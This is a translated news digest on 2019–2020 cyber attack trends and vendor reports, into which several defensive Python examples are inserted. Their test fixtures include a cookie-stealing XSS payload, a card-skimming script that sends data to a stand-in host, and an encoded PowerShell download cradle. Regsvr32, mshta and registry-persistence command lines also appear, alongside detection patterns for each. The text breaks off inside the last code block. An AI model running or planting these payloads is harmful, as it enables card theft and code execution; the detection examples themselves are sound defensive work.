Translated 2020/02/13 16:57:31

Cyber attacks

Cyber attacks target the information space of a computer: the data it holds and the physical or virtual devices on which that data is stored. An attack typically strikes the storage medium that holds, processes and transmits the user's personal information.


Models of cyber attacks

Purposes of the attacks

Modern security has no borders

Instruments of the attacks

Chronicle of events

2020: Rostelecom-Solar: surge in unusual cyber attacks on banks and the power industry

Experts of the JSOC CERT cyber incident investigation center of Rostelecom-Solar recorded a surge in a rather rare type of attack on banks and the power industry. The malicious activity chain consists of four stages, which lets the attackers gain control of the organization's IT infrastructure while remaining invisible to protective tools, including antivirus and even sandboxes. Rostelecom-Solar reported this on February 18, 2020. Read more here.


IBM X-Force research: three main attack vectors

On February 11, 2020 IBM published its annual IBM X-Force Threat Intelligence Index 2020, which shows how cybercriminals' methods have changed over several decades of illegal access to billions of corporate and personal records and the exploitation of hundreds of thousands of software vulnerabilities. According to the research, 60% of initial intrusions into the victim's infrastructure were carried out using previously stolen credentials and known software vulnerabilities, which let attackers rely less on deceiving users to gain access to data. Read more here.

Positive Technologies: 82% of all identified vulnerabilities are caused by errors in the code

On February 13, 2020 Positive Technologies reported that its experts had analyzed the security state of web applications and found that in 9 cases out of 10 attackers can attack visitors of the site, 16% of applications contain vulnerabilities that allow full control over the system to be gained, and in 8% of cases the internal corporate network can be attacked. In addition, having gained full access to the web server, hackers can post their own content on the attacked site (a defacement) or even attack its visitors, for example by infecting their computers with malware.

According to the research, in 2019 the share of web applications containing high-risk vulnerabilities decreased significantly (by 17 percentage points compared with 2018). The average number of vulnerabilities per application decreased almost one and a half times compared with 2018. Despite this, the overall security level of web applications is assessed as low.

82% of all identified vulnerabilities are caused by errors in the code. According to the experts, even among production systems they found high-risk vulnerabilities in every second one. The high percentage of errors in the source code shows that the code is not tested for vulnerabilities at the intermediate stages of its creation, and that developers still pay too little attention to security, betting on application functionality.

In 45% of the studied web applications the experts found authentication flaws (Broken Authentication); many vulnerabilities in this category are critically dangerous.

Most attacks on authentication are connected with the fact that users set only a password. The lack of a second factor makes attacks on authentication simple to carry out. The problem is aggravated by users trying to make passwords simpler. Bypassing access restrictions usually leads to unauthorized disclosure, modification or destruction of data,
says Olga Zinenko, analyst at Positive Technologies

According to the experts, 90% of web applications are exposed to the threat of attacks on clients. As in previous years, a substantial role here is played by Cross-Site Scripting (XSS). Examples of attacks on users are infection of computers with malware (the share of this attack method against individuals grew to 62% in the third quarter against 50% in the second), phishing attacks to obtain credentials or other important data, and performing actions on behalf of the user with the fraudulent clickjacking technique, in particular to inflate likes and views.
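The two client-side attacks named above come down to two server-side mistakes: writing user data into HTML without encoding it for the context it lands in, and serving pages that any site may frame. The block below is an added example (not code from the Positive Technologies research) showing the vulnerable rendering beside the hardened one, with a separate encoder for URL attributes because entity escaping alone does not stop a `javascript:` href, and a check that a response's headers actually forbid framing. The profile page, header values and payloads are constructed for illustration.

```python
"""Context-aware output encoding against XSS, and a clickjacking header check.

Added example; not code from the Positive Technologies research. The profile
page, the header values and the attacker payloads are constructed.
"""
import html
from urllib.parse import urlsplit


def render_profile_unsafe(display_name: str, homepage: str) -> str:
    """Vulnerable pattern: user-controlled values concatenated straight into HTML."""
    return f'<h1>{display_name}</h1><a href="{homepage}">homepage</a>'


def escape_text(value: str) -> str:
    """Encoding for HTML text nodes and double-quoted attribute values."""
    return html.escape(value, quote=True)


def safe_url(value: str) -> str:
    """Encoding for href/src attributes. Escaping does not neutralise a
    javascript: or data: URL, so the scheme is allow-listed first; relative
    URLs have an empty scheme and pass."""
    scheme = urlsplit(value.strip()).scheme.lower()
    if scheme not in ("", "http", "https"):
        return "#"
    return escape_text(value)


def render_profile_safe(display_name: str, homepage: str) -> str:
    """Hardened rendering: each value is encoded for the context it lands in."""
    return (f"<h1>{escape_text(display_name)}</h1>"
            f'<a href="{safe_url(homepage)}" rel="noopener">homepage</a>')


def frame_protection(headers: dict) -> bool:
    """Clickjacking defence check: the response must forbid framing by other
    origins, via CSP frame-ancestors (which browsers prefer when present) or
    X-Frame-Options. '*' or a bare scheme such as 'https:' lets any site frame."""
    lowered = {k.lower(): v for k, v in headers.items()}
    csp = lowered.get("content-security-policy", "")
    for directive in csp.split(";"):
        name, _, sources = directive.strip().partition(" ")
        if name.lower() == "frame-ancestors":
            allowed = sources.lower().split()
            return bool(allowed) and not any(s == "*" or s.endswith(":") for s in allowed)
    xfo = lowered.get("x-frame-options", "").strip().upper()
    return xfo in ("DENY", "SAMEORIGIN")


if __name__ == "__main__":
    payload = '<script>alert(document.cookie)</script>'
    print(render_profile_unsafe(payload, "javascript:alert(1)"))   # script and javascript: URL survive
    print(render_profile_safe(payload, "javascript:alert(1)"))     # inert text, href="#"
    print(frame_protection({"Content-Security-Policy": "frame-ancestors 'none'"}))  # True
    print(frame_protection({"Content-Security-Policy": "frame-ancestors *"}))       # False
```

Output encoding is the fix for reflected and stored XSS of this kind; a Content-Security-Policy without `unsafe-inline` is the second layer, and `frame-ancestors 'none'` (or `'self'` for pages that legitimately frame themselves) is what stops the clickjacking case the text describes.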

Magecart cyber attacks stealing customers' payment data have become an epidemic

On January 21, 2020 Check Point Research published its Cyber Security Report 2020. The report covers the main tools cybercriminals use to attack organizations worldwide and gives cyber security specialists and company executives the information they need to protect their organizations against current cyber attacks and fifth-generation threats.

The 2020 Security Report reveals the main malware trends and methods that Check Point researchers observed in 2019:

  • Cryptominers still dominate the malware landscape: although cryptomining dropped considerably in 2019 (owing to the fall in cryptocurrency prices and the closure of the Coinhive mining service in March), 38% of companies worldwide were attacked by cryptominers. Cybercriminals use cryptominers because the risks are rather low and the yield is high. Nevertheless, according to a Check Point Software Technologies poll in the first half of 2019, companies in Russia feared cryptominers least of all: only 7%.
  • Growth of botnets: 28% of organizations worldwide were attacked by botnets, 50% more than in 2018. Emotet was the most widespread bot malware, mainly because of its versatility and its ability to distribute other malware and spam. Other botnet activity, such as sextortion (e-mail fraud that exploits someone's sex life) and DDoS attacks, also grew sharply in 2019.
  • Targeted ransomware hits harder: the number of targeted attacks on organizations is rather small, but they can cause significant damage; the 2019 attacks on US city administrations are an example. Attackers carefully select the victim of the ransom attack to gain the maximum return.
  • Attacks on mobile devices decline: in 2019, 27% of organizations faced cyber attacks on mobile devices, compared with 33% in 2018. Organizations are aware of the threat and protect employees' mobile devices more carefully. According to a Check Point Software Technologies poll in the first half of 2019, only 16% of IT professionals in Russia have installed or plan to use special software to protect mobile devices. More than half (52%) of respondents consider a ban on using personal smartphones for work the best protection.
  • Magecart attacks have become an epidemic: these attacks inject malicious code into online-store websites to steal customers' payment data. In 2019 they hit hundreds of websites on all platforms, in large, medium and small businesses alike, from hotel chains to online stores.
  • Growth of cloud attacks: as of January 2020 more than 90% of enterprises use cloud services. 67% of security experts complain of insufficient visibility into their cloud infrastructure, its security and compliance. The scale of cloud attacks and breaches continued to grow in 2019. Misconfiguration of cloud resources is still the main cause of cloud attacks, but the number of attacks aimed directly at cloud service providers is also rising.
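A Magecart skimmer of the kind described in the list above is ordinary JavaScript that ends up on the checkout page, either injected into the store's own HTML or into a third-party script the page already loads (a tag manager, a chat widget, a CDN). The practical defence is an inventory: know which script origins the checkout page is allowed to load, require Subresource Integrity on them, and flag inline code that reads card fields and talks to the network. The block below is an added example (not code from Check Point or from any store) that audits a constructed checkout page; the allow-list and hostnames are assumed. The same inventory catches an injected browser miner script, since it too is an unexpected script origin.

```python
"""Audit the scripts on a checkout page for Magecart-style skimmers.

Added example, not from the Check Point report. Every external script must come
from an allow-listed origin and carry an integrity attribute; inline scripts that
read card fields and send data to the network are flagged. The page HTML, the
allow-list and the hostnames are constructed for illustration.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

ALLOWED_ORIGINS = {"shop.example", "cdn.shop.example", "js.psp.example"}  # assumed allow-list
CARD_FIELDS = re.compile(r"card[_-]?number|cvv|cvc|expir|cc_num|ccnum", re.I)
EXFIL = re.compile(r"(fetch\(|XMLHttpRequest|sendBeacon|new\s+Image|\.src\s*=|WebSocket)")
OBFUSCATION = re.compile(r"\b(atob|eval|unescape)\s*\(")

CHECKOUT_HTML = """<html><head>
<script src="https://cdn.shop.example/app.js" integrity="sha384-AAAA"></script>
<script src="https://js.psp.example/v1/pay.js"></script>
<script src="https://stats-cdn.example/analytics.js"></script>
</head><body>
<form id="pay"><input name="card_number"><input name="cvv"></form>
<script>
document.getElementById('pay').addEventListener('submit', function () {
  var d = document.querySelector('[name=card_number]').value + '|' +
          document.querySelector('[name=cvv]').value;
  new Image().src = 'https://stats-cdn.example/i.gif?d=' + btoa(d);
});
</script>
<script>window.dataLayer = window.dataLayer || [];</script>
</body></html>"""  # constructed page with an injected skimmer


class ScriptCollector(HTMLParser):
    """Collect external script sources (with SRI flag) and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []      # (src, has_integrity)
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.external.append((a["src"], "integrity" in a))
        else:
            self._in_script = True

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._buf, self._in_script = [], False


def audit_checkout(html_text: str, allowed=ALLOWED_ORIGINS) -> list:
    """Return findings as (severity, description) tuples; empty list means clean."""
    p = ScriptCollector()
    p.feed(html_text)
    findings = []
    for src, has_sri in p.external:
        host = urlsplit(src).hostname or ""
        if host and host not in allowed:
            findings.append(("high", f"script from non-allow-listed origin: {src}"))
        elif host and not has_sri:
            findings.append(("medium", f"external script without integrity attribute: {src}"))
    for code in p.inline:
        exfil = EXFIL.search(code)
        if CARD_FIELDS.search(code) and exfil:
            hosts = set(re.findall(r"https?://([^/'\"\s]+)", code)) - set(allowed)
            findings.append(("high", f"inline script reads card fields and sends data "
                                     f"({exfil.group(1)}) to {sorted(hosts) or 'unknown'}"))
        elif OBFUSCATION.search(code):
            findings.append(("medium", "inline script decodes/evals code, common skimmer obfuscation"))
    return findings


if __name__ == "__main__":
    for severity, text in audit_checkout(CHECKOUT_HTML):
        print(severity.upper(), text)
```

Run this against the rendered checkout page on a schedule, not once: Magecart injections are frequently made into a supplier's script long after the store's own code was reviewed, so the first sign is a new origin or a changed script body, which is exactly what the inventory and the integrity attribute make visible.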

Main categories of cyber attacks in the EMEA region (chart)
"In 2019 we observed a wide threat landscape. We live in an era of a cyber arms race, and the number and sophistication of attacks will keep growing. Even if an organization is equipped with the most comprehensive and modern security products, the risk of being hacked remains; it cannot be completely eliminated. Organizations need to develop a proactive plan to stay ahead of cybercriminals and prevent potential attacks. Detecting and automatically blocking an attack at an early stage can prevent damage. The Check Point 2020 Security Report describes the main trends that organizations should pay attention to and how they can win using key methods",

The Check Point 2020 Security Report is based on data from ThreatCloud intelligence, a collaborative network against cybercrime that provides threat data and attack trends from a global network of threat sensors; on Check Point research over the last 12 months; and on a poll of IT specialists and senior managers that assesses their readiness for threats.

Analysis of high-profile information security incidents in 2019

2019 was rich in incidents. Many cases of improper information storage and late remediation of critical vulnerabilities that led to large data leaks were reported, as were many attacks on financial institutions, retail and Internet of Things infrastructure. Several attacks with dangerous consequences were carried out against industrial enterprises. The article describes the largest and most interesting attacks, loosely grouped by the key gap in the protection system or the key action taken by the attacker.

The USA, China, India, Russia and Vietnam are the main sources of all types of attacks in Q1-Q2

On December 17, 2019 it became known that, citing a study by CenturyLink (USA), Nikolay Murashov, deputy director of the National Coordination Center for Computer Incidents (NKTsKI), named the USA, China, India, Russia and Vietnam (in descending order) as the main sources of all types of attacks in Q1-Q2 2019. The leaders in phishing attacks are also the USA, followed by Germany, the Netherlands, France and Russia. The undisputed lead in distributing malware through web resources belongs to the USA, followed by China, the Netherlands, Great Britain and Germany. These are the results of the international study that Nikolay Murashov shared.

According to NKTsKI, the main targets of computer attacks on information resources in the Russian Federation in 2019 were the credit and financial sector (33%), government bodies (27%), the defense industry and space (18%), science and education (9%) and others (13%). In 2020 NKTsKI expects the trend to persist, with the credit and financial sector still exposed to the greatest danger because of attackers' desire to make money.

As of December 2019 NKTsKI monitors tens of thousands of different objects, 50% of which are critical information infrastructure (CII) objects. At the end of 2019 the largest number of attacks were repelled in the rocket and space, defense and chemical industries.

It is there that attackers look for any opportunity to obtain restricted information, including information that constitutes a commercial or other secret protected by law,


As the deputy director of NKTsKI noted, in 2019, as in previous years, infections with ransomware encryptors aimed at obtaining a ransom were recorded.

Compared with other states, the situation with this type of malware in the Russian Federation can be called calm; as of December 2019 the number of such infections is decreasing,
reported Nikolay Murashov

However, Nikolay Murashov pointed out that the niche of ransomware encryptors has been taken by malware that hijacks other people's resources for cryptocurrency mining.

Compared with other states, the situation with this type of malware in the Russian Federation can be called calm. The value of such virtual money is rather high, so there are many who want to earn it easily. Miners hack the computers of ordinary users and use their computing resources for their own purposes. Up to about 80% of the captured computer's power can be used to generate virtual coins. Very often the legitimate users do not know about it,
noted Nikolay Murashov

As Nikolay Murashov specified, hijacking the servers of large companies for mining threatens a significant decline in their performance, which entails significant damage to the business.

It should be noted that the number of detected cases of cryptocurrency mining using the infected information resources of various state and municipal organizations is huge. In this case attackers infect web pages, and mining is performed when users of those resources view them in the browser,
Nikolay Murashov gave as an example[1]

Fortinet: development of AI and threat intelligence will change the traditional advantages of cybercriminals

On December 5, 2019 Fortinet published its threat landscape forecast for 2020 and the following years, prepared by the FortiGuard Labs team of experts. The research reveals the directions in which cybercriminals will act in the near future and outlines the approaches that will help organizations protect themselves from future attacks.

"Earlier, the success of attackers was largely connected with the expansion of the cyber attack surface and the gaps in security that digital transformation created. Recently their attack techniques have become even more sophisticated thanks to the integration of early forms of AI and swarm technology. Fortunately, the previous level of security can be restored if many companies adhere to the same strategy for protecting the networks through which criminals organize attacks. This will require a unified approach using broad, integrated and automated solutions to ensure protection and accountability of all network segments as well as diverse edge devices, from IoT to dynamically connected clouds",

noted Derek Manky, Chief of Security Insights and Global Threat Alliances at Fortinet

As Fortinet notes, in recent years cyber attack techniques have become increasingly sophisticated, which has increased their effectiveness and speed. This trend will most likely persist until enough organizations in the market change their approach to their protection strategy. Given the scale of the global threat landscape and the speed and complexity of cyber attacks, organizations must respond to emerging threats in real time, at machine speed, to resist aggressive actions effectively. Applying the latest achievements in artificial intelligence (AI) and threat intelligence will become vital in this fight.

One long-term goal in the development of AI for security is the creation of an adaptive threat immune system that works like the human immune system. Development of the first generation of such AI focused on using various machine learning models, which learned, adapted and proposed an action plan for repelling an attack. In second-generation AI systems the emphasis was on building an intelligent analysis mechanism. Its level had grown considerably by then, and it allowed the identification of patterns that significantly improve various functions, such as access control, by placing learning nodes across all protection directions. Third-generation AI systems are moving away from a monolithic processing center towards a system of regional learning nodes. Data is collected locally and used for distributed comparison, correction and analysis. This will be extremely important for companies looking for ways to protect their expanding edge segments.

In addition to traditional forms of threat analysis using data from open sources or from studying internal traffic and accumulated information, future machine learning systems will over time actively use data collected from new-generation edge devices and passed to local learning nodes. By tracking and correlating information in real time, an AI system will gain a better understanding of the current threat state. It will also be able to adjust the operation of local devices, setting their rules for incident response. This will allow future AI security systems to recognize threats, adjust their actions, track and prepare response measures, communicating within the network. Finally, the distributed learning system will allow data sets to be integrated to adapt to changing conditions, trends and events. Thus each event will improve the quality of the whole system, and information about an incident obtained in one place will raise awareness of current threats across the entire system.

Implementing AI lets companies not only automate tasks but also build an automated system for finding and identifying cyber attacks, both after signs appear and before the scenario is carried out. By combining machine learning and statistical analysis, organizations can develop an individual AI-supported action plan to improve threat resolution and response. Prepared response scenarios (playbooks) should learn to identify patterns with which AI will predict the attacker's actions, suggest when the next attack is likely to begin and even identify the suspects behind the threat. If this data can be fed to the AI learning system, remote learning nodes will be able to maintain effective and proactive protection that is not limited to threat detection but also predicts subsequent actions, intervenes proactively in the process and coordinates with other nodes to counter the attack simultaneously along its propagation path.

According to Fortinet, one of the most important factors in fighting espionage is effective counterintelligence. The same is true for cyber attacks and for defenses where all actions are carefully monitored. The defending side has a clear advantage in access to diverse threat information. Cybercriminals usually do not have this capability, which is now being augmented by machine learning and AI. However, the use of smart deception can lead to countermeasures from attackers: they learn to distinguish legitimate traffic from decoys and try to do so unnoticed, so as not to reveal themselves during the attack. To resist this strategy effectively, organizations will need to add response scenarios and improved AI algorithms to their arsenal. This will help not only to detect intruders analyzing legitimate traffic but also to improve deception technology so that decoys cannot be told apart from legitimate messages. In future, organizations should learn to respond to any espionage technique before active actions begin, retaining the upper hand in control.

Organizations involved in cyber security have a number of unique privileges regarding access to personal information; representatives of the criminal underworld have no such rights. This allows law enforcement agencies to build their own command centers with global reach and to extend their actions to individuals, with the ability to watch cybercriminals in real time and react to their actions. The existing system of legal acts and the connections with public and private services can also help identify offenders and respond. One can expect initiatives to form a uniform approach to communication between international and local law enforcement agencies, government organizations, the corporate sector and security experts. This will contribute to the development of a system for timely and secure information exchange to build the protection of critical infrastructure and strengthen the fight against cybercrime.

The capabilities organizations introduce into their protection strategy will hardly go unanswered by the adversary. The introduction of improved methods of detecting and countering cyber attacks will lead cybercriminals to attempt something else, even more serious. Against the background of more refined attack methods, an expanding set of potential attack directions and the introduction of smarter AI systems, the ingenuity of the cyber underworld is not decreasing either.

Fortinet's recent Threat Landscape report noted the growing popularity of various advanced evasion techniques. They are designed specifically to avoid detection, disable protection and monitoring functions, operate under the radar of protection systems and apply Living off the Land (LotL) tactics: using legitimately installed software and disguising malicious traffic as legitimate. Many modern malware samples already contain functions to evade detection by antivirus software and other threat countermeasures, but attackers keep applying ever more sophisticated methods of obfuscation and anti-analysis. With such growth strategies the importance of the weak points that can remain in security tools, and that arise from human error, increases considerably.

In recent years the market has seen growing popularity of swarm technology, which accomplishes an assigned task through massed, coordinated, identical actions. The use of machine learning and AI in attacks against legitimate networks and devices has produced one more application of this technology. On the one hand, its achievements matter for applied tasks in medicine, transport, mechanical engineering and automation. However, when used maliciously, and when organizations do not change their protection strategy, the balance can shift in favor of the attackers. Cybercriminals can apply swarm technology in bot attacks to penetrate a network, suppress internal defenses and search for and steal data more efficiently. Specialized bots equipped with specific functions that exchange and compare data in real time are expected to appear over time. As a result, target selection will speed up and attack tactics will become more varied. Cybercriminals will be able to attack not just one but many targets at the same time.

Over time the spread of 5G networks can become the catalyst for functional swarm attacks. Their cornerstone will be the ability to build local ad hoc networks that can quickly exchange and process data and launch applications. Compromised devices can become a channel for distributing malicious code through the misuse of 5G and edge computing. If they are assembled into a group, coordinated attacks at 5G speeds become possible. Given the speed, degree of intelligence and local nature of such attacks, older protection technologies may be under threat, which will prompt the search for ways to counter such threats effectively.

Traditionally, finding a zero-day vulnerability and developing an exploit took a lot of effort and time, so cybercriminals were in no hurry to use them, keeping them in reserve while other attack options remained. The present situation is characterized by growth in the possible threat directions and by easier vulnerability discovery, which threatens a potential increase in the number of zero-day vulnerabilities. Fuzzing technologies and systematic searching (mining) for zero-day vulnerabilities with the help of AI also contribute to exponential growth in the number of such cyber attacks. Protective measures should therefore be taken in advance to resist this trend.

Accenture: main threats to business information security

On September 20, 2019 Accenture presented the results of a study identifying the main threats to business information security in 2019. According to Accenture, the cyber security services market is growing at rates similar to the digital and IT markets. Accenture predicts that by 2021 the global cybersecurity market will grow by 66% to $202 billion. At the same time, the cumulative global damage from cyber attacks could grow by 39% by 2021, to $2.1 billion. Read more here.

Trend Micro: the number of fileless attacks in the first half of the year grew by 265%

On August 30, 2019 it became known that Trend Micro Incorporated, a global leader in cyber security solutions, had published its summary report for the first half of 2019. It notes a surge in the prevalence of fileless attacks aimed at concealing malicious activity: the number of such threats detected grew 265% compared with the first half of 2018.

The results obtained in 2019 thus confirm the numerous forecasts Trend Micro made in 2018, namely that attackers now work smarter and focus on the enterprises and environments that give them the greatest return on their effort.

Sophistication and cunning: that is how modern cyberthreats can be characterized. Corporate technologies and IT infrastructures are becoming more connected and 'smarter'. Attackers carry out deliberate, targeted, artful attacks that covertly exploit people, processes and technologies. On the business side, digital transformation and the move to cloud computing continue to gain popularity, which widens the attack surface for corporate attacks. To navigate these changes, companies need a technology partner that can combine human expertise with advanced security technologies for better detection, correlation, response and remediation of threats,


Alongside the growth in fileless threats in the first half of the year, the report notes how often attackers carried out attacks that bypass traditional security filters because they run in system memory, reside in the registry or abuse legitimate tools. Exploit kits also returned: their number grew 136% compared with the first half of 2018.
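Because a fileless attack leaves no binary on disk for a file scanner to inspect, the detection has to move to process behaviour: which parent launched which interpreter, with what command line, and what that command line decodes to. The block below is an added example (not code from the Trend Micro report) of that logic run over constructed process-creation events in a simplified `key=value` form; the rule names, the `bad.example` hosts and the sample command lines are assumptions. In production the same rules would run over Sysmon event 1 or Security event 4688 with command-line auditing enabled.

```python
"""Flag fileless and living-off-the-land activity in process-creation events.

Added example, not from the Trend Micro report. The events are constructed in a
simplified key=value form (parent, image, cmd); real sources would be Sysmon
event 1 or Windows Security event 4688 with command-line auditing enabled.
"""
import base64
import re

# Built here so the sample is exact: powershell -enc takes base64 of UTF-16LE text.
ENC = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://bad.example/p')".encode("utf-16-le")
).decode()

EVENTS = [  # constructed sample telemetry, not real logs
    'parent=explorer.exe image=notepad.exe cmd="notepad.exe C:\\Users\\a\\notes.txt"',
    f'parent=WINWORD.EXE image=powershell.exe cmd="powershell.exe -nop -w hidden -enc {ENC}"',
    'parent=cmd.exe image=regsvr32.exe cmd="regsvr32 /s /n /u /i:http://bad.example/x.sct scrobj.dll"',
    'parent=cmd.exe image=mshta.exe cmd="mshta javascript:a=GetObject(\\"script:http://bad.example/y\\").Exec()"',
    'parent=services.exe image=svchost.exe cmd="svchost.exe -k netsvcs"',
    'parent=cmd.exe image=reg.exe cmd="reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v u /d '
    '\\"powershell -w hidden -c [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String((gp HKCU:\\Software\\x).p))\\""',
]

RULES = [
    ("encoded PowerShell command", re.compile(r"powershell.*\s-(e|ec|en|enc|encodedcommand)\b", re.I)),
    ("hidden window / no profile", re.compile(r"powershell.*\s-(w(indowstyle)?\s+hidden|nop(rofile)?)\b", re.I)),
    ("download cradle / in-memory decode",
     re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\bIEX\b|Invoke-Expression|FromBase64String", re.I)),
    ("regsvr32 scriptlet (squiblydoo)", re.compile(r"regsvr32.*\s/i:https?://.*scrobj\.dll", re.I)),
    ("mshta inline script", re.compile(r"mshta\s+(javascript|vbscript):", re.I)),
    ("Run-key persistence with script", re.compile(r"\breg(\.exe)?\s+add\s+HK.*\\CurrentVersion\\Run\b", re.I)),
    ("Office spawning a shell",
     re.compile(r"^parent=(winword|excel|powerpnt|outlook)\.exe .*image=(powershell|cmd|wscript|cscript|mshta)\.exe", re.I)),
]
ENC_ARG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
KV = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')


def parse_event(line: str) -> dict:
    """Split the key=value record; cmd is double-quoted with \\" escapes inside."""
    out = {}
    for key, val in KV.findall(line):
        out[key] = val[1:-1].replace('\\"', '"') if val.startswith('"') else val
    return out


def decode_encoded_command(cmd: str) -> str:
    """Recover the script hidden behind powershell -enc (base64 of UTF-16LE)."""
    m = ENC_ARG.search(cmd)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyze(line: str) -> list:
    """Names of every rule that fires on the event. The decoded command is
    appended so that rules also see what the base64 was hiding."""
    decoded = decode_encoded_command(parse_event(line).get("cmd", ""))
    text = line + "\n" + decoded
    return [name for name, rx in RULES if rx.search(text)]


def triage(events: list) -> list:
    """(index, hits) for every event that fired at least one rule."""
    return [(i, analyze(line)) for i, line in enumerate(events) if analyze(line)]


if __name__ == "__main__":
    for idx, hits in triage(EVENTS):
        print(idx, EVENTS[idx].split(" cmd=")[0], "->", "; ".join(hits))
```

Two points worth noticing in the output: the download cradle in event 1 is only visible after the `-enc` argument is decoded, and the Run-key event is a registry-resident payload, the "stored in the registry" case the report describes, which a file scanner never sees.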

Cryptocurrency-mining malware kept its status as the most frequently detected threat in the first half of 2019, and attackers increasingly used it to attack servers and cloud environments. Confirming another forecast, the number of routers involved in possible inbound attacks jumped 64% compared with the first half of 2018, with more and more Mirai worm variants searching for exposed devices.

In addition, the number of digital extortion schemes grew 319% from the second half of 2018, in line with earlier forecasts. Business e-mail compromise (BEC) remains the main threat: detections of such threats grew 52% over the last six months. The number of ransomware-related files, e-mails and URLs also grew 77% over the same period.

Trend Micro detected and blocked 1.8 billion ransomware threats worldwide from January 2016 to June 2019. Russia accounts for 4.15% of all ransomware infections in the Eastern Europe region; Ukraine for 0.92% (0.14% globally). In Central Asia, Kazakhstan accounts for 0.04% (0.02% globally). In Western Asia, Azerbaijan accounts for 0.10% (0.04% globally) and Georgia for 0.02% (0.01% globally).

Russia is among the top 10 countries in which mobile ransomware is recorded: up to 4.2% of detections among countries (February 2019) and up to 785 blocks (March 2019).

In total, Trend Micro products blocked more than 26.8 billion threats in the first half of 2019, 6 billion more than in the same period of the previous year. Notably, 91% of them reached corporate networks by e-mail. Eliminating such advanced threats requires deep, intelligent protection that can correlate data from gateways, networks, servers and endpoints to identify and stop attacks most effectively.

Check Point: the number of attacks on mobile banking doubled in the first half of the year

On August 1, 2019 Check Point Software Technologies released its Cyber Attack Trends: 2019 Mid-Year Report. Hackers continue to develop new toolkits and methods aimed at corporate data stored in cloud infrastructure, on personal mobile devices, in various applications and even on popular e-mail platforms. The researchers note that no sector is fully protected from cyber attacks.

Categories of cyber attacks by region according to Check Point Software Technologies

Check Point experts identified the key cyberthreat trends in the first half of 2019:

  • Mobile banking: the number of attacks doubled compared with 2018. Banking malware is a very common mobile threat. It can steal payment data, credentials and funds from victims' bank accounts. New versions of banking malware are ready for mass distribution to anyone willing to pay for them.
  • Supply chain attacks: cybercriminals can expand their reach by attacking a company's supply chain. In this type of cyber attack hackers inject malicious code directly into the victim company's software. Once the code runs, criminals can gain access to the company's private information.
  • E-mail: attackers use various methods to bypass security solutions and spam filters. For example, they send heavily encoded e-mails and complex underlying code that mixes plain text letters with HTML character references. They also apply social engineering and vary and personalize e-mail content.
  • Cloud storage: the growing popularity of public cloud environments has increased the number of cyber attacks aimed at the huge volumes of confidential data held on these platforms. The most serious cloud security threats in 2019 are misconfiguration and poor management of cloud resources.
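The e-mail evasion in the list above works because a filter that matches keywords against the raw HTML never sees the word the reader sees: "PayPal" written as `&#80;&#97;&#121;...`, a keyword broken up with zero-width joiners, filler text hidden by CSS to dilute a spam score, and a link whose visible text is a legitimate URL while its href is not. The answer is to render the message the way the reader's client does before filtering. The block below is an added example (not code from the Check Point report) that normalises a constructed phishing message this way; the brand, hostnames and thresholds are assumptions.

```python
"""Normalise obfuscated phishing HTML before content filtering.

Added example, not from the Check Point report. The message below is
constructed: brand words are split into HTML character references, zero-width
joiners break up a keyword, filler text is hidden with CSS, and the visible
link text disagrees with the real href.
"""
import html
import re
import unicodedata
from html.parser import HTMLParser
from urllib.parse import urlsplit

ZERO_WIDTH = {ord(c): None for c in "\u200b\u200c\u200d\u2060\ufeff\u00ad"}
CHARREF = re.compile(r"&#(x[0-9a-fA-F]+|[0-9]+);")

SAMPLE_EMAIL = """<html><body>
<p>Your &#80;&#97;&#121;&#80;&#97;&#108; acc&#x6F;unt has been l&zwj;i&zwnj;m&#x69;ted.</p>
<p>Please <a href="http://paypa1-secure.example/login">https://www.paypal.com/signin</a>
to ver&#105;fy your identity within 24 hours.</p>
<p style="font-size:0">lorem ipsum harmless filler text to dilute the spam score</p>
</body></html>"""  # constructed sample, not a real message


def normalise_text(s: str) -> str:
    """Decode entities, fold compatibility characters (NFKC), drop zero-width
    characters and collapse whitespace: the text as a reader perceives it."""
    s = unicodedata.normalize("NFKC", html.unescape(s)).translate(ZERO_WIDTH)
    return re.sub(r"\s+", " ", s).strip()


def encoded_plain_chars(raw_html: str) -> int:
    """Count character references that encode ordinary ASCII letters or digits;
    legitimate mail almost never needs to write 'a' as &#97;."""
    n = 0
    for m in CHARREF.finditer(raw_html):
        ref = m.group(1)
        code = int(ref[1:], 16) if ref[0] in "xX" else int(ref)
        if code < 128 and chr(code).isalnum():
            n += 1
    return n


class MailView(HTMLParser):
    """Collect the raw text a reader sees, the links, and CSS-hidden elements.
    References are re-serialised here and decoded once in normalise_text."""

    def __init__(self):
        super().__init__(convert_charrefs=False)
        self.text, self.links, self.hidden = [], [], 0
        self._href, self._link_text = None, []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        style = (a.get("style") or "").replace(" ", "").lower()
        if "font-size:0" in style or "display:none" in style:
            self.hidden += 1
        if tag == "a" and a.get("href"):
            self._href, self._link_text = a["href"], []

    def handle_data(self, data):
        self.text.append(data)
        if self._href is not None:
            self._link_text.append(data)

    def handle_charref(self, name):
        self.handle_data(f"&#{name};")

    def handle_entityref(self, name):
        self.handle_data(f"&{name};")

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((normalise_text("".join(self._link_text)), self._href))
            self._href = None


def analyse_email(raw_html: str) -> dict:
    """Rendered text, (visible text, href) link pairs, and evasion findings."""
    view = MailView()
    view.feed(raw_html)
    findings = []
    if encoded_plain_chars(raw_html) >= 3:      # assumed threshold
        findings.append("character-reference encoding of plain letters")
    if view.hidden:
        findings.append(f"{view.hidden} hidden element(s) carrying filler text")
    for shown, href in view.links:
        shown_host = urlsplit(shown).hostname if "://" in shown else None
        real_host = urlsplit(href).hostname
        if shown_host and real_host and shown_host != real_host:
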